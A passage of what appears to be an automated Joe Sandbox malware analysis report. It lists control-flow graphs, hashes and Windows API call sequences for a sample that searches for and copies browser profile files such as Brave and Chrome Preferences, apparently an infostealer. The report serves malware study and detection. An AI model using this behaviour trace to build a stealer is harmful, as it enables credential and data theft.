                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                          • Instruction ID: 822a68ba0681b22967503a2222785f0e102d58cfae2bd9798b899adfc8918474
                          • Opcode Fuzzy Hash: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                          • Instruction Fuzzy Hash: A8F027701082444BEB186A64DD4A32EF7D9EB46350F10493BEEDAE72E2E278C840857F
                          Function 00418C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2895 418c88-418cc4 StrCmpCA 2898 418cc6-418cc7 ExitProcess 2895->2898 2899 418ccd-418ce6 2895->2899 2901 418ee2-418eef call 402a20 2899->2901 2902 418cec-418cf1 2899->2902 2903 418cf6-418cf9 2902->2903 2905 418ec3-418edc 2903->2905 2906 418cff 2903->2906 2905->2901 2944 418cf3 2905->2944 2908 418d84-418d92 StrCmpCA 2906->2908 2909 418da4-418db8 StrCmpCA 2906->2909 2910 418d06-418d15 lstrlen 2906->2910 2911 418e88-418e9a lstrlen 2906->2911 2912 418e6f-418e7d StrCmpCA 2906->2912 2913 418d30-418d3f lstrlen 2906->2913 2914 418e56-418e64 StrCmpCA 2906->2914 2915 418d5a-418d69 lstrlen 2906->2915 2916 418dbd-418dcb StrCmpCA 2906->2916 2917 418ddd-418deb StrCmpCA 2906->2917 2918 418dfd-418e0b StrCmpCA 2906->2918 2919 418e1d-418e2b StrCmpCA 2906->2919 2920 418e3d-418e4b StrCmpCA 2906->2920 2908->2905 2928 418d98-418d9f 2908->2928 2909->2905 2933 418d17-418d1c call 402a20 2910->2933 2934 418d1f-418d2b call 402930 2910->2934 2921 418ea4-418eb0 call 402930 2911->2921 2922 418e9c-418ea1 call 402a20 2911->2922 2912->2905 2937 418e7f-418e86 2912->2937 2923 418d41-418d46 call 402a20 2913->2923 2924 418d49-418d55 call 402930 2913->2924 2914->2905 2936 418e66-418e6d 2914->2936 2925 418d73-418d7f call 402930 2915->2925 2926 418d6b-418d70 call 402a20 2915->2926 2916->2905 2929 418dd1-418dd8 2916->2929 2917->2905 2930 418df1-418df8 2917->2930 2918->2905 2931 418e11-418e18 2918->2931 2919->2905 2932 418e31-418e38 2919->2932 2920->2905 2935 418e4d-418e54 2920->2935 2955 418eb3-418eb5 2921->2955 2922->2921 2923->2924 2924->2955 2925->2955 2926->2925 2928->2905 2929->2905 2930->2905 2931->2905 2932->2905 2933->2934 2934->2955 2935->2905 2936->2905 2937->2905 2944->2903 2955->2905 2956 418eb7-418eb9 2955->2956 2956->2905 2957 418ebb-418ebd lstrcpy 2956->2957 2957->2905
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 199727815f74bd6f548b200098013af7923e8b2be706878c7c6ca2245bdf0acd
                          • Instruction ID: cf156cc369858262e2dadb611c66b3ae29e6092b46f6725d5e09786bedaf1566
                          • Opcode Fuzzy Hash: 199727815f74bd6f548b200098013af7923e8b2be706878c7c6ca2245bdf0acd
                          • Instruction Fuzzy Hash: 75E0D860500245F7D7049BB9CC89D86BB6CAF94714B04802DF5048B211DB65EC03C7A8
                          Function 00422AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2958 422ad0-422b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 422b44-422b59 2958->2959 2960 422b24-422b36 2958->2960
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00422AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00422B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 0be16655d1dcf82a79328a1c088b057431a11f06d39f8fcbc5b2efcdb50dc0fe
                          • Instruction ID: 161a44a7ca907f82e4f91189bba25393484f2c5b0b651073a0db56667aea58a7
                          • Opcode Fuzzy Hash: 0be16655d1dcf82a79328a1c088b057431a11f06d39f8fcbc5b2efcdb50dc0fe
                          • Instruction Fuzzy Hash: 45018F72A44618ABC714CF99AD45B9AB7A8F744B21F00026AE915D2780D7B819008AA5

                          Non-executed Functions

                          Function 00412390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004123D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004123F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00412402
                          • lstrlen.KERNEL32(\*.*), ref: 0041240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00412436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00412486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 77def00054b922a86f955edf876f6a5a3c710cb0914003e28737d80166cab566
                          • Instruction ID: b0db976fdef61ef6b5df8073a0384315e56344567102d4c60de99346afafca47
                          • Opcode Fuzzy Hash: 77def00054b922a86f955edf876f6a5a3c710cb0914003e28737d80166cab566
                          • Instruction Fuzzy Hash: 44A27571A112169FCB21AF75DE88ADF77B9AF04304F04502AB805E7391DBB8DD458FA8
                          Function 004016A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004016E2
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040176C
                          • lstrcat.KERNEL32(00000000), ref: 00401776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004017A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004017EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004017F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401875
                          • lstrcat.KERNEL32(00000000), ref: 0040187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004018AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 004018F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004018FE
                          • lstrlen.KERNEL32(00431794), ref: 00401909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401929
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401966
                          • lstrlen.KERNEL32(\*.*), ref: 00401971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0040199A
                            • Part of subcall function 00424040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0042406D
                            • Part of subcall function 00424040: lstrcpy.KERNEL32(00000000,?), ref: 004240A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004019C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401A16
                          • lstrlen.KERNEL32(00431794), ref: 00401A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A41
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401A81
                          • lstrlen.KERNEL32(00431794), ref: 00401A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401AAC
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00401B45
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 00401B70
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00401B8A
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401C03
                          • lstrlen.KERNEL32(00431794), ref: 00401C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401C31
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401C74
                          • lstrlen.KERNEL32(00431794), ref: 00401C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401CA2
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401CAE
                          • lstrlen.KERNEL32(?), ref: 00401CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00401CE9
                          • lstrlen.KERNEL32(00431794), ref: 00401CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401D14
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401DEB
                          • lstrlen.KERNEL32(00431794), ref: 00401DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401E19
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401E56
                          • lstrlen.KERNEL32(00431794), ref: 00401E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401E81
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401E8D
                          • lstrlen.KERNEL32(?), ref: 00401E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 00401EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00401F45
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401F9F
                          • lstrlen.KERNEL32(00FB8B30), ref: 00401FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00401FE3
                          • lstrlen.KERNEL32(00431794), ref: 00401FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040200E
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00402042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040204D
                          • lstrlen.KERNEL32(00431794), ref: 00402058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402075
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00402081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: b47ce8a7f0e21845c30875caa1eccb5d7b5f46704766099070902513762b18b6
                          • Instruction ID: 460b8ac86f72d25f6e5ebb92b52d643007554856965cf67df0604cdf190c526c
                          • Opcode Fuzzy Hash: b47ce8a7f0e21845c30875caa1eccb5d7b5f46704766099070902513762b18b6
                          • Instruction Fuzzy Hash: 41928571A112169BCB21AF65DE88AAF77B9AF44304F04503AF805B72E1DB78DD05CFA4
                          Function 0040DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DBEF
                          • lstrlen.KERNEL32(00434CA8), ref: 0040DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DC17
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 0040DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DC4C
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DC8F
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0040DCD0
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0040DCF0
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0040DD0A
                          • lstrlen.KERNEL32(0042CFEC), ref: 0040DD1D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DD7B
                          • lstrlen.KERNEL32(00431794), ref: 0040DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DDA3
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DDAF
                          • lstrlen.KERNEL32(?), ref: 0040DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0040DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DE19
                          • lstrlen.KERNEL32(00431794), ref: 0040DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040DE6F
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DE7B
                          • lstrlen.KERNEL32(00FB89D0), ref: 0040DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DEBB
                          • lstrlen.KERNEL32(00431794), ref: 0040DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040DEE6
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DEF2
                          • lstrlen.KERNEL32(00FB8A50), ref: 0040DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DFA5
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DFB1
                          • lstrlen.KERNEL32(00FB89D0), ref: 0040DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DFF4
                          • lstrlen.KERNEL32(00431794), ref: 0040DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E022
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040E02E
                          • lstrlen.KERNEL32(00FB8A50), ref: 0040E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0040E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040E0E7
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E11F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0040E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0040E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E19F
                          • lstrcat.KERNEL32(00000000), ref: 0040E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0040E1F9
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E22F
                          • lstrlen.KERNEL32(00FB8B30), ref: 0040E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E261
                          • lstrcat.KERNEL32(00000000,00FB8B30), ref: 0040E269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 0040E274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0040E2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E349
                          • DeleteFileA.KERNEL32(?), ref: 0040E381
                          • StrCmpCA.SHLWAPI(?,00FBCFF8), ref: 0040E3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E445
                          • StrCmpCA.SHLWAPI(?,00FB8A50), ref: 0040E468
                          • StrCmpCA.SHLWAPI(?,00FB89D0), ref: 0040E47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0040E4E0
                          • StrCmpCA.SHLWAPI(?,00FBD010), ref: 0040E58E
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0040E639
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E678
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E737
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040E776
                          • DeleteFileA.KERNEL32(?), ref: 0040E7D2
                          • StrCmpCA.SHLWAPI(?,00FB8B50), ref: 0040E7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E916
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
